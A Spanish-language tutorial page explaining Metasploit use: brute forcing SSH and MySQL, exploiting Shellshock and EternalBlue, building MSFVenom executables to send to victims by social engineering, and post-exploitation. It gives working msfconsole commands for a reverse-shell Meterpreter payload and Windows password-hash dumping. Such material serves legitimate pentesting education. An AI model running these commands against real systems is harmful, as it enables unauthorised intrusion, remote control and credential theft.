Hacking con metasploit
www.onlinetis.com
Metasploit Framework es una herramienta fundamental en el mundo de la ciberseguridad, utilizada tanto por profesionales del pentesting (hacking ético) como por atacantes maliciosos. Su principal función es ayudar a identificar, explotar y validar vulnerabilidades en sistemas y redes.
Aquí tienes algunos ejemplos concretos de cómo se utiliza Metasploit, agrupados por el tipo de módulo que se usa:
1. Ataque de fuerza bruta (Módulos Auxiliares)
Metasploit puede automatizar ataques de fuerza bruta para adivinar contraseñas de servicios como SSH, FTP o bases de datos.
Escenario: Quieres obtener acceso a una máquina Linux cuyo usuario conoces (por ejemplo, "mario"), pero no su contraseña.
Proceso:
Seleccionas el módulo auxiliar de fuerza bruta para SSH.
Configuras el objetivo (la IP de la máquina) y el usuario ("mario").
Le proporcionas a Metasploit una "wordlist" (un archivo con una lista de posibles contraseñas).
Metasploit intenta automáticamente cada contraseña de la lista hasta encontrar la correcta, permitiendo que obtengas acceso al sistema.
2. Explotación de vulnerabilidades (Módulos Exploit)
Este es el uso más conocido de Metasploit, que aprovecha una vulnerabilidad específica en un software o sistema para obtener acceso.
Escenario: Descubres que un servidor web utiliza una versión antigua de un software que tiene una vulnerabilidad conocida (por ejemplo, Shellshock, con el CVE-2014-6271).
Proceso:
Buscas el exploit correspondiente a esa vulnerabilidad dentro de Metasploit.
Configuras el exploit con la IP de la máquina vulnerable.
Seleccionas un "payload" (la carga útil que se ejecutará una vez que la vulnerabilidad sea explotada, como por ejemplo, una "reverse shell" que te dará una línea de comandos).
Ejecutas el exploit, y si la máquina es vulnerable, obtendrás una sesión de control remoto.
3. Post-explotación (Módulos Post)
Una vez que has obtenido acceso a un sistema, Metasploit tiene módulos diseñados para realizar tareas adicionales.
Escenario: Has logrado obtener una shell en una máquina de un usuario sin privilegios de administrador.
Proceso:
Usas un módulo post para escalar privilegios. Este módulo podría buscar y explotar una vulnerabilidad local para convertirte en el usuario "root" (en Linux) o "Administrador" (en Windows).
Utilizas otros módulos para tareas como volcar hashes de contraseñas, tomar capturas de pantalla, o pivotar hacia otras máquinas en la misma red.
4. Generación de payloads (MSFVenom)
MSFVenom es una herramienta integrada en Metasploit que se usa para crear payloads personalizados.
Escenario: Quieres crear un archivo ejecutable malicioso que, cuando una víctima lo abra, te dé una sesión de Meterpreter (una shell avanzada de Metasploit).
Proceso:
Usas MSFVenom para generar un archivo
.execon el payload de Meterpreter.Configuras tu máquina de atacante (el LHOST) y el puerto de escucha (LPORT) para recibir la conexión.
Envías el archivo a la víctima a través de ingeniería social.
Cuando la víctima ejecuta el archivo, se establece una conexión de vuelta a tu máquina, dándote control sobre su sistema.
Aquí tienes ejemplos del uso de la consola de Metasploit, conocida como msfconsole, para realizar diferentes tareas de ciberseguridad.
La
msfconsolees la interfaz de línea de comandos principal de Metasploit Framework. Es una herramienta poderosa para probar vulnerabilidades en sistemas y redes.1. Escaneo de vulnerabilidades (Módulos Auxiliares)
Los módulos auxiliares (
auxiliary) se utilizan para tareas de reconocimiento y escaneo, sin explotar directamente una vulnerabilidad.Objetivo: Identificar si un servidor está utilizando un servicio de base de datos MySQL y si tiene la configuración por defecto.
Comandos en
msfconsole:
Shellmsf6 > use auxiliary/scanner/mysql/mysql_login msf6 auxiliary(scanner/mysql/mysql_login) > set RHOSTS 192.168.1.100 msf6 auxiliary(scanner/mysql/mysql_login) > set USERNAME root msf6 auxiliary(scanner/mysql/mysql_login) > runExplicación:
use auxiliary/scanner/mysql/mysql_login: Carga el módulo auxiliar para intentar un ataque de fuerza bruta básico en un servicio de MySQL.set RHOSTS 192.168.1.100: Define la dirección IP del objetivo.set USERNAME root: Especifica el nombre de usuario a probar. Por defecto, este módulo intentará contraseñas comunes o nulas.run: Ejecuta el módulo.
2. Explotación de una vulnerabilidad (Módulos Exploit)
Los módulos
exploitson el corazón de Metasploit. Se utilizan para aprovechar una vulnerabilidad específica en un sistema objetivo y obtener acceso.Objetivo: Explotar la vulnerabilidad de EternalBlue (MS17-010) en un sistema Windows vulnerable para obtener una sesión de control remoto.
Comandos en
msfconsole:
Shellmsf6 > use exploit/windows/smb/ms17_010_eternalblue msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.1.150 msf6 exploit(windows/smb/ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.1.101 msf6 exploit(windows/smb/ms17_010_eternalblue) > runExplicación:
use exploit/windows/smb/ms17_010_eternalblue: Carga el módulo de exploit para la vulnerabilidad EternalBlue.set RHOSTS 192.168.1.150: Define la dirección IP del sistema Windows vulnerable.set PAYLOAD windows/x64/meterpreter/reverse_tcp: Elige la carga útil (payload). En este caso, se usameterpreter, que es una shell avanzada que se conectará desde la víctima (reverse) a tu máquina.set LHOST 192.168.1.101: Define tu dirección IP, que es donde elpayloaddebe conectarse.run: Ejecuta el exploit. Si tiene éxito, se abrirá una sesión de Meterpreter.
3. Post-Explotación (Módulos Post)
Una vez que se tiene una sesión activa en un sistema comprometido, los módulos
postse utilizan para realizar tareas adicionales, como recolectar información o escalar privilegios.Objetivo: Obtener las contraseñas guardadas en un sistema Windows después de haber conseguido una sesión de Meterpreter.
Comandos en
msfconsole:
Shellmsf6 > sessions msf6 > sessions -i 1 meterpreter > run post/windows/gather/smart_hashdumpExplicación:
sessions: Muestra las sesiones activas de Meterpreter.sessions -i 1: Entra en la sesión con el ID 1.run post/windows/gather/smart_hashdump: Ejecuta el módulo post para volcar los hashes de las contraseñas del sistema, lo que permite descifrarlas más tarde.
